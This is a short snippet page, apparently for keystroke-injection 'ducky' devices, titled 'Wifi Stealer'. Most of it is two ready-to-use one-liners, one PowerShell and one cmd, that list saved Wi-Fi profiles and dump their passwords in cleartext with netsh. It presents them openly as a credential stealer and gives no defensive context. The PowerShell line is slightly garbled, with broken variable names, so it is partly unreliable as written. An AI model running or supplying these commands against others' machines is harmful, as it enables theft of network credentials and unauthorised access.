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Wifi Stealer inspired by Manjuska Framework/TCM

Wireless will always be inferior :)

(netsh wlan show profiles) | Select-String ":(.+)$" | %{$name=$.Matches.Groups[1].Value.Trim(); $} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+:(.+)$" | %{$pass=$.Matches.Groups[1].Value.Trim(); $} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -Wrap

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

WHID for ESP based duckys